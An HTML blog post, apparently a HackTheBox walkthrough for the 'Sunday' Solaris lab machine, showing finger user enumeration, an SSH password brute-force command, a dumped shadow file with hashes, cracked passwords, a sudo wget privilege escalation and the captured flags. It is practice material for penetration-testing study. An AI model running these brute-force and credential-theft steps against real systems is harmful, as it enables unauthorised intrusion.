<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox - Sunday | amirr0r</title><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="HackTheBox - Sunday" /><meta name="author" content="amirr0r" /><meta property="og:locale" content="en_US" /><meta name="description" content="Foothold" /><meta property="og:description" content="Foothold" /><link rel="canonical" href="https://amirr0r.github.io/posts/htb-sunday/" /><meta property="og:url" content="https://amirr0r.github.io/posts/htb-sunday/" /><meta property="og:site_name" content="amirr0r" /><meta property="og:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/Sunday.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-04T12:13:03+01:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/Sunday.png" /><meta property="twitter:title" content="HackTheBox - Sunday" /><meta name="twitter:site" content="@amirr0r_" /><meta name="twitter:creator" content="@amirr0r" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Foothold","headline":"HackTheBox - Sunday","dateModified":"2021-01-04T12:13:03+01:00","datePublished":"2021-01-04T12:13:03+01:00","@type":"BlogPosting","image":"https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/Sunday.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://amirr0r.github.io/posts/htb-sunday/"},"url":"https://amirr0r.github.io/posts/htb-sunday/","author":{"@type":"Person","name":"amirr0r"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">amirr0r</a></div><div class="site-subtitle font-italic"></div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/amirr0r" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/amirr0r_" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/amir-barnat/?locale=en_US" target="_blank"> <i class="fab fa-linkedin-in"></i> </a> <a href="/feed.xml" > <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Refactor the HTML structure. --> <!-- Suroundding the markdown table with '<div class="table-wrapper">. and '</div>' --> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox - Sunday</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 4, 2021, 12:13 PM +0100" > Jan 4, 2021 <i class="unloaded">2021-01-04T12:13:03+01:00</i> </span> by <span class="author"> amirr0r </span></div><div> Updated <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 4, 2021, 12:22 PM +0100" > Jan 4, 2021 <i class="unloaded">2021-01-04T12:22:23+01:00</i> </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/Sunday.png" class="post-preview-img"><h2 id="foothold">Foothold</h2><h3 id="nmap-scan"><code class="language-plaintext highlighter-rouge">nmap</code> scan</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Sunday-full-port-scan.txt 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 09:27 CET
Warning: 10.10.10.76 giving up on port because retransmission cap hit (1).
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.79% done; ETC: 09:27 (0:00:19 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.11s latency).
Not shown: 64580 filtered ports, 950 closed ports
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
41462/tcp open  unknown
49906/tcp open  unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
</pre></table></code></div></div><h3 id="finger-port-79">finger (port 79)</h3><p>We can use pentestmonkey’s script <a href="https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl">finger-user-enum.pl</a> to do our enumeration:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/finger-users.png" alt="finger users top usernames" /></p><p>Okay, we know there iis at least 5 users:</p><ol><li><strong>root</strong></li><li><strong>admin</strong></li><li><strong>adm</strong></li><li><strong>mysql</strong></li><li><strong>user</strong></li></ol><p>While figuring out what to do next on <a href="https://book.hacktricks.xyz/pentesting/pentesting-finger">Hacktricks - pentesting finger</a>, I ran <code class="language-plaintext highlighter-rouge">finger-user-enum.pl</code> a second time with a bigger wordlist:</p><blockquote><p>We could also use <strong>metasploit</strong> with <code class="language-plaintext highlighter-rouge">use auxiliary/scanner/finger/finger_users</code>.</p></blockquote><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span>./finger-user-enum.pl <span class="nt">-U</span> /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt <span class="nt">-t</span> <span class="nv">$TARGET</span>
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/finger-users-2.png" alt="finger users more usernames" /></p><p>From the screenshot above, we can notice tree things:</p><ol><li>We got more valid usernames</li><li>The user <code class="language-plaintext highlighter-rouge">sunny</code> seems to have been connected from a remote IP address <code class="language-plaintext highlighter-rouge">10.10.10.4</code></li><li>The user <code class="language-plaintext highlighter-rouge">root</code> seems to have been connected from the local machine <code class="language-plaintext highlighter-rouge">sunday</code></li></ol><h3 id="ssh-port-22022">SSH (port 22022)</h3><h4 id="bruteforce-old-ssh-with-patator">Bruteforce old SSH with <code class="language-plaintext highlighter-rouge">patator</code></h4><p>Probably due to an exchange algorithm error, we’ll use <code class="language-plaintext highlighter-rouge">patator</code> instead of using <code class="language-plaintext highlighter-rouge">hydra</code> to bruteforce ssh.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>patator ssh_login <span class="nv">host</span><span class="o">=</span><span class="nv">$TARGET</span> <span class="nv">port</span><span class="o">=</span>22022 <span class="nv">user</span><span class="o">=</span>sunny <span class="nv">password</span><span class="o">=</span>FILE0 <span class="nv">0</span><span class="o">=</span>/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt <span class="nv">persistent</span><span class="o">=</span>0 <span class="nt">-x</span> ignore:mesg<span class="o">=</span><span class="s1">'Authentication failed
.'</span> <span class="nt">--timeout</span><span class="o">=</span>5
</pre></table></code></div></div><p>Valid credentials found/guessed:</p><ul><li><strong>username</strong>: <code class="language-plaintext highlighter-rouge">sunny</code></li><li><strong>password</strong>: <code class="language-plaintext highlighter-rouge">sunday</code></li></ul><h2 id="user-sunny">User (sunny)</h2><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="nv">$ </span>ssh <span class="nt">-p</span> 22022 sunny@<span class="nv">$TARGET</span>
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g<span class="o">==</span>,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

<span class="nv">$ </span>ssh <span class="nt">-oKexAlgorithms</span><span class="o">=</span>+diffie-hellman-group1-sha1 <span class="nt">-p</span> 22022 sunny@<span class="nv">$TARGET</span>
The authenticity of host <span class="s1">'[10.10.10.76]:22022 ([10.10.10.76]:22022)'</span> can<span class="s1">'t be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span><span class="o">[</span>10.10.10.76]:22022<span class="s1">' (RSA) to the list of known hosts.
Password: 
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$ 
</span></pre></table></code></div></div><p>There is another user called <code class="language-plaintext highlighter-rouge">sammy</code> who has a home directory:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>sunny@sunday:~<span class="nv">$ </span><span class="nb">cd</span> ..
sunny@sunday:/export/home<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 8
drwxr-xr-x  4 root  root   4 2018-04-15 20:18 <span class="nb">.</span>
drwxr-xr-x  3 root  root   3 2018-04-15 19:44 ..
drwxr-xr-x 18 sammy staff 27 2020-07-31 18:00 sammy
drwxr-xr-x 18 sunny other 30 2018-04-15 20:52 sunny
</pre></table></code></div></div><p>Let’s run <code class="language-plaintext highlighter-rouge">sudo -l</code>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>sunny@sunday:/tmp<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User sunny may run the following commands on this host:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /root/troll
</pre></table></code></div></div><p>Since we can only execute it, I will not spend time on it <em>(for the moment)</em>.</p><p>On <code class="language-plaintext highlighter-rouge">/</code>, there is <code class="language-plaintext highlighter-rouge">backup</code> directory which we have access to:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre>sunny@sunday:/tmp<span class="nv">$ </span><span class="nb">cd</span> /backup
sunny@sunday:/backup<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 5
drwxr-xr-x  2 root root   4 2018-04-15 20:44 <span class="nb">.</span>
drwxr-xr-x 26 root root  27 2020-07-31 17:59 ..
<span class="nt">-r-x--x--x</span>  1 root root  53 2018-04-24 10:35 agent22.backup
<span class="nt">-rw-r--r--</span>  1 root root 319 2018-04-15 20:44 shadow.backup
sunny@sunday:/backup<span class="nv">$ </span><span class="nb">cat </span>shadow.backup
mysql:NP:::::::
openldap:<span class="k">*</span>LK<span class="k">*</span>:::::::
webservd:<span class="k">*</span>LK<span class="k">*</span>:::::::
postgres:NP:::::::
svctag:<span class="k">*</span>LK<span class="k">*</span>:6445::::::
nobody:<span class="k">*</span>LK<span class="k">*</span>:6445::::::
noaccess:<span class="k">*</span>LK<span class="k">*</span>:6445::::::
nobody4:<span class="k">*</span>LK<span class="k">*</span>:6445::::::
sammy:<span class="nv">$5$Ebkn8jlK$i6SSPa0</span>.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:<span class="nv">$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3</span>:17636:::::
</pre></table></code></div></div><blockquote><p><code class="language-plaintext highlighter-rouge">$5$</code> is for SHA-256 hash.</p></blockquote><h3 id="cracking-sammys-password-with-hashcat">“Cracking” sammy’s password with <code class="language-plaintext highlighter-rouge">hashcat</code></h3><p>According to the manpage of <code class="language-plaintext highlighter-rouge">hashcat</code>, <strong>7400</strong> is SHA-256 mode:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/man-hashcat.png" alt="74400 sha256 unix" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/hashcat.png" alt="hashcat" /></p><p>Sammy’s password is <code class="language-plaintext highlighter-rouge">cooldude!</code>.</p><h2 id="user-sammy">User (sammy)</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/sammy-ssh.png" alt="sammy ssh" /></p><ul><li>flag:</li></ul><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>sammy@sunday:~<span class="nv">$ </span><span class="nb">cd </span>Desktop
sammy@sunday:~/Desktop<span class="nv">$ </span><span class="nb">cat </span>user.txt
a3d9498027ca5187ba1793943ee8a598
</pre></table></code></div></div><ul><li><code class="language-plaintext highlighter-rouge">sudo -l</code>:</li></ul><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>sammy@sunday:~/Desktop<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
User sammy may run the following commands on this host:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/wget
sammy@sunday:~/Desktop<span class="err">$</span>
</pre></table></code></div></div><p>Let’s check <code class="language-plaintext highlighter-rouge">wget</code> on <a href="https://gtfobins.github.io/gtfobins/wget/">GTFOBins - wget</a> to see how we can privesc:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/wget-gtfobins.png" alt="wget gtfobins" /></p><p>We cannot use it to privesc!</p><p>Even if we can download a malicious file and then execute it, it will not be done as <strong>root</strong> but as <strong>sammy</strong>. This is because of the pipe (<code class="language-plaintext highlighter-rouge">|</code>) as you can see on the image below:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/reverse-shell-failed.png" alt="reverse shell failed" /></p><p>However there are other things that we can probably do.</p><ol><li>We can <strong>read</strong> every file:</li></ol><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/etc-shadow.png" alt="/etc/shadow" /></p><ol><li>We can <strong>overwrite</strong> the <code class="language-plaintext highlighter-rouge">/root/troll</code> binary</li></ol><h2 id="root">Root</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="https://amirr0r.github.io/assets/img/htb/machines/linux/easy/sunday/root.png" alt="root" /></p><ul><li>flag:</li></ul><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>root@sunday:~# <span class="nb">cd</span> /root
root@sunday:/root# <span class="nb">cat </span>root.txt
fb40fab61d99d37536daeec0d97af9b8
</pre></table></code></div></div><hr /><h2 id="useful-links">Useful links</h2><ul><li><a href="https://github.com/pentestmonkey/finger-user-enum">pentestmokey - finger enum</a></li><li><a href="https://book.hacktricks.xyz/pentesting/pentesting-finger">hacktricks - pentesting finger</a></li><li><a href="https://hashcat.net/wiki/doku.php?id=example_hashes">Hashcat - example hashes</a></li></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox-walkthroughs/'>Hackthebox walkthroughs</a>, <a href='/categories/linux/'>Linux</a>, <a href='/categories/easy/'>Easy</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb-linux-easy/" class="post-tag no-text-decoration" >htb-linux-easy</a> <a href="/tags/solaris/" class="post-tag no-text-decoration" >Solaris</a> <a href="/tags/sunos/" class="post-tag no-text-decoration" >SunOS</a> <a href="/tags/finger/" class="post-tag no-text-decoration" >finger</a> <a href="/tags/guessing/" class="post-tag no-text-decoration" >guessing</a> <a href="/tags/patator/" class="post-tag no-text-decoration" >patator</a> <a href="/tags/hashcat/" class="post-tag no-text-decoration" >hashcat</a> <a href="/tags/sudo-misconfiguration/" class="post-tag no-text-decoration" >sudo misconfiguration</a> <a href="/tags/gtfobins/" class="post-tag no-text-decoration" >GTFOBins</a> <a href="/tags/wget/" class="post-tag no-text-decoration" >wget</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/oscp-prep/" class="post-tag no-text-decoration" >oscp-prep</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox - Sunday - amirr0r&url=https://amirr0r.github.io/posts/htb-sunday/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox - Sunday - amirr0r&u=https://amirr0r.github.io/posts/htb-sunday/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox - Sunday - amirr0r&url=https://amirr0r.github.io/posts/htb-sunday/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/crto-review/">CRTO Review (Certified Red Team Operator) & Notion Templates</a></li><li><a href="/posts/htb-forest/">HackTheBox - Forest</a></li><li><a href="/posts/oscp-review/">OSCP Review (Cheat Sheet, Tmux Enumeration Scripts and Notion Templates)</a></li><li><a href="/posts/oscp-prep/">How do I prepare for the OSCP?</a></li><li><a href="/posts/htb-valentine/">HackTheBox - Valentine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" 